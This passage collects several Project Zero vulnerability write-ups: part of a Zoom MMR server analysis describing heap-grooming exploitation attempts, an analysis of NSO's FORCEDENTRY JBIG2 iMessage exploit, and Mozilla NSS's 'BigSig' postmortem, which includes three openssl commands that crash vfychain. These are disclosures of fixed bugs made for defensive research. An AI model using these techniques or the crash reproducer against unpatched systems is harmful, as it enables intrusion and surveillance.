My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique user accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met these criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location, were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes; however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers; meanwhile, no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to those of other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially given that the server lacked ASLR and supported modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols, which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features I tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

15 December 2021 at 17:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products", Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, the hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required; the attacker doesn't need to send phishing messages, and the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990s, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain-specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the Xerox WorkCentre device shown below. If you used the scan-to-PDF functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2 for its scan-to-PDF functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDF files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios that are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page, in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition). A JBIG2 encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.

Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.
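
As a toy illustration of the recovery step (my own sketch, assuming byte-aligned bitmaps for simplicity), the lossless case is just an XOR over the canvas:

#include <cstdint>
#include <cstddef>

// XOR the stored difference mask onto the substituted glyph already on the
// canvas: substituted ^ diff == original, recovering the exact pixels.
void refine_xor(uint8_t* canvas, const uint8_t* diff_mask, size_t n) {
    for (size_t i = 0; i < n; ++i)
        canvas[i] ^= diff_mask[i];
}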

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types, which include operations like defining a new page, decoding a Huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.
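
The lookup pattern can be sketched as follows (my own simplified illustration with stand-in types, not the Xpdf code itself):

#include <vector>

struct Segment { unsigned segNum; /* ... */ };

// Linear scan over all known segments: O(n) per lookup, where n is the
// number of segments defined so far.
Segment* findSegmentSketch(std::vector<Segment*>& segments, unsigned segNum) {
    for (Segment* seg : segments) {
        if (seg->segNum == segNum)
            return seg;
    }
    return nullptr;
}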

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)
  numSyms = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)
      } else if (seg->getType() == jbig2SegCodeTable) {
        codeTables->append(seg);
      }
    } else {
      error(errSyntaxError, getPos(),
            "Invalid segment reference in JBIG2 text region");
      delete codeTables;
      return;
    }
  }

...

  // get the symbol bitmaps
  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)
  kk = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        symbolDict = (JBIG2SymbolDict *)seg;
        for (k = 0; k < symbolDict->getSize(); ++k) {
          syms[kk++] = symbolDict->getBitmap(k); // (4)
        }
      }
    }
  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.
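
A self-contained illustration of the wraparound arithmetic (the symbol counts here are hypothetical, chosen only to show the effect):

#include <cstdint>
#include <cstdio>

int main() {
    uint32_t numSyms = 0;
    // Two huge crafted symbol counts plus a small one: the 32-bit sum wraps.
    uint32_t sizes[] = { 0x80000000u, 0x80000000u, 0x40u };
    for (uint32_t s : sizes)
        numSyms += s;                        // 0x100000040 mod 2^32
    printf("numSyms = 0x%x\n", numSyms);     // prints 0x40: undersized count
    return 0;
}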

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegment routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently, since JBIG2Bitmap inherits from JBIG2Segment, the seg->getType() virtual call succeeds even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls). However, the returned type will no longer equal jbig2SegSymbolDict, causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian, the w and line fields are likely to be overwritten with 0x1 (the most-significant half of a JBIG2Bitmap pointer), while the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer: a fairly random value, depending on heap layout and ASLR, somewhere between 0x100000 and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is Turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1, creating a NAND gate.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.
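
In code form, the same construction is trivial (a toy sketch):

// NOT via XOR-with-1, then an AND gate in front to form the universal NAND.
bool NOT(bool a)          { return a ^ 1; }
bool NAND(bool a, bool b) { return NOT(a && b); }
// From NAND everything else follows, e.g.:
bool OR(bool a, bool b)   { return NAND(NOT(a), NOT(b)); }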

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

This shouldn't have happened: A vulnerability postmortem

1 December 2021 at 18:38

Posted by Tavis Ormandy, Project Zero

Introduction

This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.

In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.

First, let’s take a look at the bug; then I’ll explain how I found it and try to understand why we missed it for so long.

Analysis

Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.

struct VFYContextStr {
   SECOidTag hashAlg; /* the hash algorithm */
   SECKEYPublicKey *key;
   union {
       unsigned char buffer[1];
       unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];
       unsigned char ecdsasig[2 * MAX_ECKEY_LEN];
       unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];
   } u;
   unsigned int pkcs1RSADigestInfoLen;
   unsigned char *pkcs1RSADigestInfo;
   void *wincx;
   void *hashcx;
   const SECHashObject *hashobj;
   SECOidTag encAlg;    /* enc alg */
   PRBool hasSignature;
   SECItem *params;
};

Fig 1. The VFYContext structure from NSS.


The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.

Okay, but what happens if you just....make a signature that’s bigger than that?

Well, it turns out the answer is memory corruption. Yes, really.


The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.

The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:

# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj,
# which contains function pointers (bigger would work too, but takes longer to generate).
$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key

# Generate a self-signed certificate from that key
$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer

# Verify it with NSS...
$ vfychain -a bigsig.cer

Segmentation fault

Fig 2. Reproducing the BigSig vulnerability in three easy commands.

The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.

           case rsaPssKey:
               sigLen = SECKEY_SignatureLen(key);
               if (sigLen == 0) {
                   /* error set by SECKEY_SignatureLen */
                   rv = SECFailure;
                   break;
               }
               if (sig->len != sigLen) {
                   PORT_SetError(SEC_ERROR_BAD_SIGNATURE);
                   rv = SECFailure;
                   break;
               }
               PORT_Memcpy(cx->u.buffer, sig->data, sigLen);
               break;

Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob.

I think this vulnerability raises a few immediate questions:

  • Was this a recent code change or regression that hadn’t been around long enough to be discovered? No, the original code was checked in with ECC support on the 17th October 2003, but wasn't exploitable until some refactoring in June 2012. In 2017, RSA-PSS support was added and made the same error.

  • Does this bug require a long time to generate a key that triggers the bug? No, the example above generates a real key and signature, but it can just be garbage as the overflow happens before the signature check. A few kilobytes of A’s works just fine.

  • Does reaching the vulnerable code require some complicated state that fuzzers and static analyzers would have difficulty synthesizing, like hashes or checksums? No, it has to be well-formed DER, that’s about it.

  • Is this an uncommon code path? No, Firefox does not use this code path for RSA-PSS signatures, but the default entrypoint for certificate verification in NSS, CERT_VerifyCertificate(), is vulnerable.

  • Is it specific to the RSA-PSS algorithm? No, it also affects DSA signatures.

  • Is it unexploitable, or otherwise limited impact? No, the hashobj member can be clobbered. That object contains function pointers, which are used immediately.

This wasn’t a process failure; the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties and invest in memory safety, fuzzing and test coverage.

NSS was one of the very first projects included with oss-fuzz; it has been officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.

I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.

Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.

  • Did Mozilla have good test coverage for the vulnerable areas? YES.
  • Did Mozilla/chrome/oss-fuzz have relevant inputs in their fuzz corpus? YES.
  • Is there a mutator capable of extending ASN1_ITEMs? YES.
  • Is this an intra-object overflow, or other form of corruption that ASAN would have difficulty detecting? NO, it's a textbook buffer overflow that ASAN can easily detect.

How did I find the bug?

I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.

Stack Coverage

The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.

#include <stdio.h>
#include <string.h>
#include <limits.h>

static char buf[128];

void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); }
void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); }
void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }

typedef void (* dispatch_t)(int, size_t);

dispatch_t handlers[UCHAR_MAX] = {
    cmd_handler_foo,
    cmd_handler_bar,
    cmd_handler_baz,
};

int main(int argc, char **argv)
{
    int cmd;

    while ((cmd = getchar()) != EOF) {
        if (handlers[cmd]) {
            handlers[cmd](getchar(), getchar());
        }
    }
}

Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1]

To solve this problem, I’ve been experimenting with monitoring the call stack during execution.

The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.

Object Isolation

Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.

